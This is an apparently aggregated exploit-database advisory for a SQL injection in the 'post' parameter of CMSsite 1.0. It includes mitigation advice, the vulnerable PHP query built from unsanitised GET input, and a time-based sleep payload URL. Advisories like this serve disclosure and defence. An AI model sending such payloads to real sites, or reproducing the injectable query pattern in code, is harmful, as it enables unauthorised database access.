header-logo
Suggest Exploit
vendor:
CMSsite
by:
Mr Winst0n
9
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: CMSsite
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali linux, Windows 8.1
2019

CMSsite 1.0 – ‘post’ SQL Injection

This exploit allows an attacker to perform SQL injection in the 'post' parameter of the CMSsite 1.0 application. By manipulating the 'post' parameter, an attacker can execute arbitrary SQL queries, potentially gaining unauthorized access to the database or performing other malicious actions.

Mitigation:

To mitigate this vulnerability, the developer should use prepared statements or parameterized queries to handle user input and prevent SQL injection attacks. Input validation and sanitization should also be implemented to ensure only valid data is accepted.
Source

Exploit-DB raw data:

# Exploit Title: CMSsite 1.0 - 'post' SQL Injection

# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 17, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1 


# PoC:
# Vulnerable File: post.php
# Vulnerable Parameter : post

if (isset($_GET['post'])) {
	$post = $_GET['post'];
}
$query = "SELECT * FROM posts WHERE post_id=$post";
$run_query = mysqli_query($con, $query);



# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))